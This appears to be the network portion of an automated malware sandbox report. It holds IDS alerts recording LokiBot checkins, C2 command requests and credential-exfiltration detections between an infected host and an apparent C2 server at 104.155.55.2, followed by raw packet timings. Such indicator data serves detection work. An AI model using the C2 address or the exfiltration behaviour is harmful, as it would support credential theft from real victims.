                                    06/23/22-18:09:36.768062 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49842 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:50.688333 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 58625 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:49.079457 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49765 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:53.475797 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49772 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:48.152005 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:59.728406 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49865 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:43.382677 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:59.805159 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49775 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:02.062353 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49776 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:22.007803 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 64412 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:09:30.935127 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 57442 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:09:47.624966 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49856 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:45.504366 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49754 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:16.412962 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49896 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:40.300507 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 53802 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:43.382677 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49751 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:09.603862 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49892 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:09.603862 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49892 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:40.626646 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:21.018222 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49795 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:47.624966 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49856 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:40.626646 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:56.128163 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49773 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:59.580734 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 55795 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:44.299706 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49751 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:59.728406 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49865 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:02.062353 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49776 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:59.746955 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 59795 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:10:16.412962 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49896 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:04.362566 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49777 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:00.690473 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49865 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:13.286095 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49783 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:20.096905 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49795 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:08.917855 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49780 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:30.995615 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49838 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:55.686777 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 64589 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:34.891799 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:55.746969 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49858 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:59.805159 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49775 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:55.746969 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49858 | 80 | 192.168.2.3 | 104.155.55.2
                                    192.168.2.3104.155.55.249754802825766 06/23/22-18:08:45.504366TCP2825766ETPRO TROJAN LokiBot Checkin M24975480192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497782025483 06/23/22-18:09:07.428229TCP2025483ET TROJAN LokiBot Fake 404 Response8049778104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249795802825766 06/23/22-18:09:20.096905TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249879802025381 06/23/22-18:10:05.859589TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497812025483 06/23/22-18:09:11.937966TCP2025483ET TROJAN LokiBot Fake 404 Response8049781104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249842802024318 06/23/22-18:09:36.768062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249850802025381 06/23/22-18:09:41.932837TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249746802825766 06/23/22-18:08:32.826506TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.860195532014169 06/23/22-18:10:16.356290UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6019553192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497462025483 06/23/22-18:08:33.658945TCP2025483ET TROJAN LokiBot Fake 404 Response8049746104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.858950532014169 06/23/22-18:09:41.871608UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5895053192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249778802024318 06/23/22-18:09:06.486197TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249775802021641 06/23/22-18:08:59.805159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802021641 06/23/22-18:08:48.152005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802024313 06/23/22-18:09:11.023804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802024318 06/23/22-18:09:11.023804TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249895802025381 06/23/22-18:10:14.615169TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498792025483 06/23/22-18:10:06.706850TCP2025483ET TROJAN LokiBot Fake 404 Response8049879104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249745802024318 06/23/22-18:08:30.578499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.858116532014169 06/23/22-18:08:30.221090UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5811653192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380498322025483 06/23/22-18:09:28.697078TCP2025483ET TROJAN LokiBot Fake 404 Response8049832104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249743802024312 06/23/22-18:08:26.365310TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802024318 06/23/22-18:09:30.995615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249778802024313 06/23/22-18:09:06.486197TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498382025483 06/23/22-18:09:31.916398TCP2025483ET TROJAN LokiBot Fake 404 Response8049838104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.864996532014169 06/23/22-18:09:06.418101UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6499653192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249750802021641 06/23/22-18:08:40.626646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249773802024318 06/23/22-18:08:56.128163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249856802024313 06/23/22-18:09:47.624966TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802024313 06/23/22-18:09:30.995615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249746802025381 06/23/22-18:08:32.826506TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249787802025381 06/23/22-18:09:17.520239TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.862724532014169 06/23/22-18:09:19.486245UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6272453192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249773802024313 06/23/22-18:08:56.128163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802024313 06/23/22-18:09:22.064496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249856802024318 06/23/22-18:09:47.624966TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249879802825766 06/23/22-18:10:05.859589TCP2825766ETPRO TROJAN LokiBot Checkin M24987980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249776802024313 06/23/22-18:09:02.062353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249772802825766 06/23/22-18:08:53.475797TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497722025483 06/23/22-18:08:54.444254TCP2025483ET TROJAN LokiBot Fake 404 Response8049772104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249850802021641 06/23/22-18:09:41.932837TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802024318 06/23/22-18:09:22.064496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249743802024317 06/23/22-18:08:26.365310TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249896802021641 06/23/22-18:10:16.412962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249744802825766 06/23/22-18:08:28.518392TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249842802825766 06/23/22-18:09:36.768062TCP2825766ETPRO TROJAN LokiBot Checkin M24984280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249745802021641 06/23/22-18:08:30.578499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249867802025381 06/23/22-18:10:03.646769TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249783802021641 06/23/22-18:09:13.286095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802024318 06/23/22-18:08:50.748195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.864816532014169 06/23/22-18:09:04.295727UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6481653192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249832802025381 06/23/22-18:09:27.755282TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802024313 06/23/22-18:08:50.748195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249754802025381 06/23/22-18:08:45.504366TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249795802025381 06/23/22-18:09:20.096905TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249858802021641 06/23/22-18:09:55.746969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802024318 06/23/22-18:08:48.152005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497832025483 06/23/22-18:09:14.166477TCP2025483ET TROJAN LokiBot Fake 404 Response8049783104.155.55.2192.168.2.3
                                    104.155.55.2192.168.2.380497762025483 06/23/22-18:09:02.967256TCP2025483ET TROJAN LokiBot Fake 404 Response8049776104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.850152532014169 06/23/22-18:09:17.432912UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5015253192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249776802024318 06/23/22-18:09:02.062353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497872025483 06/23/22-18:09:18.447312TCP2025483ET TROJAN LokiBot Fake 404 Response8049787104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249777802825766 06/23/22-18:09:04.362566TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249743802825766 06/23/22-18:08:26.365310TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249749802825766 06/23/22-18:08:34.891799TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802825766 06/23/22-18:09:30.995615TCP2825766ETPRO TROJAN LokiBot Checkin M24983880192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498582025483 06/23/22-18:09:56.667986TCP2025483ET TROJAN LokiBot Fake 404 Response8049858104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249892802025381 06/23/22-18:10:09.603862TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802021641 06/23/22-18:09:11.023804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498922025483 06/23/22-18:10:10.533295TCP2025483ET TROJAN LokiBot Fake 404 Response8049892104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249850802825766 06/23/22-18:09:41.932837TCP2825766ETPRO TROJAN LokiBot Checkin M24985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249832802825766 06/23/22-18:09:27.755282TCP2825766ETPRO TROJAN LokiBot Checkin M24983280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249865802025381 06/23/22-18:09:59.728406TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.857723532014169 06/23/22-18:08:28.453791UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5772353192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249776802025381 06/23/22-18:09:02.062353TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498562025483 06/23/22-18:09:48.532794TCP2025483ET TROJAN LokiBot Fake 404 Response8049856104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.849327532014169 06/23/22-18:08:45.421000UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4932753192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249777802021641 06/23/22-18:09:04.362566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.855269532014169 06/23/22-18:10:05.798868UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5526953192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249751802024313 06/23/22-18:08:43.382677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249780802021641 06/23/22-18:09:08.917855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249751802024318 06/23/22-18:08:43.382677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.852096532014169 06/23/22-18:09:08.858532UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5209653192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249775802025381 06/23/22-18:08:59.805159TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498502025483 06/23/22-18:09:42.794326TCP2025483ET TROJAN LokiBot Fake 404 Response8049850104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249892802825766 06/23/22-18:10:09.603862TCP2825766ETPRO TROJAN LokiBot Checkin M24989280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249832802021641 06/23/22-18:09:27.755282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249867802021641 06/23/22-18:10:03.646769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249743802021641 06/23/22-18:08:26.365310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249780802825766 06/23/22-18:09:08.917855TCP2825766ETPRO TROJAN LokiBot Checkin M24978080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249778802021641 06/23/22-18:09:06.486197TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249879802024313 06/23/22-18:10:05.859589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802021641 06/23/22-18:09:30.995615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249879802024318 06/23/22-18:10:05.859589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249749802021641 06/23/22-18:08:34.891799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249778802825766 06/23/22-18:09:06.486197TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249750802025381 06/23/22-18:08:40.626646TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802021641 06/23/22-18:09:22.064496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.849775532014169 06/23/22-18:10:14.553567UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4977553192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249787802825766 06/23/22-18:09:17.520239TCP2825766ETPRO TROJAN LokiBot Checkin M24978780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249744802025381 06/23/22-18:08:28.518392TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249850802024313 06/23/22-18:09:41.932837TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249850802024318 06/23/22-18:09:41.932837TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249867802825766 06/23/22-18:10:03.646769TCP2825766ETPRO TROJAN LokiBot Checkin M24986780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249842802025381 06/23/22-18:09:36.768062TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249745802024313 06/23/22-18:08:30.578499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249783802024313 06/23/22-18:09:13.286095TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802825766 06/23/22-18:08:48.152005TCP2825766ETPRO TROJAN LokiBot Checkin M24976580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249896802025381 06/23/22-18:10:16.412962TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249783802024318 06/23/22-18:09:13.286095TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249777802024318 06/23/22-18:09:04.362566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498422025483 06/23/22-18:09:37.680341TCP2025483ET TROJAN LokiBot Fake 404 Response8049842104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249895802021641 06/23/22-18:10:14.615169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249895802825766 06/23/22-18:10:14.615169TCP2825766ETPRO TROJAN LokiBot Checkin M24989580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249772802025381 06/23/22-18:08:53.475797TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802021641 06/23/22-18:08:50.748195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802825766 06/23/22-18:08:50.748195TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802825766 06/23/22-18:09:22.064496TCP2825766ETPRO TROJAN LokiBot Checkin M24980780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249746802021641 06/23/22-18:08:32.826506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249787802021641 06/23/22-18:09:17.520239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:48.185348034 CEST8049765104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:48.185455084 CEST4976580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:48.218689919 CEST8049765104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:49.079457045 CEST8049765104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:49.079494953 CEST8049765104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:49.079642057 CEST4976580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:49.079706907 CEST4976580192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:49.112863064 CEST8049765104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:50.710907936 CEST4977180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:50.745114088 CEST8049771104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:50.745498896 CEST4977180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:50.748194933 CEST4977180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:50.782248974 CEST8049771104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:50.782381058 CEST4977180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:50.816462040 CEST8049771104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:51.674694061 CEST8049771104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:51.674741030 CEST8049771104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:51.674823999 CEST4977180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:51.674871922 CEST4977180192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:51.709244967 CEST8049771104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:53.438504934 CEST4977280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:53.472656012 CEST8049772104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:53.472852945 CEST4977280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:53.475796938 CEST4977280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:53.510015965 CEST8049772104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:53.510099888 CEST4977280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:53.544181108 CEST8049772104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:54.444253922 CEST8049772104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:54.444293976 CEST8049772104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:54.444437981 CEST4977280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:54.444475889 CEST4977280192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:54.478458881 CEST8049772104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:56.088562012 CEST4977380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:56.122750998 CEST8049773104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:56.122909069 CEST4977380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:56.128163099 CEST4977380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:56.162476063 CEST8049773104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:56.162686110 CEST4977380192.168.2.3104.155.55.2
                                    Jun 23, 2022 18:08:56.196795940 CEST8049773104.155.55.2192.168.2.3
                                    Jun 23, 2022 18:08:56.994401932 CEST8049773104.155.55.2192.168.2.3
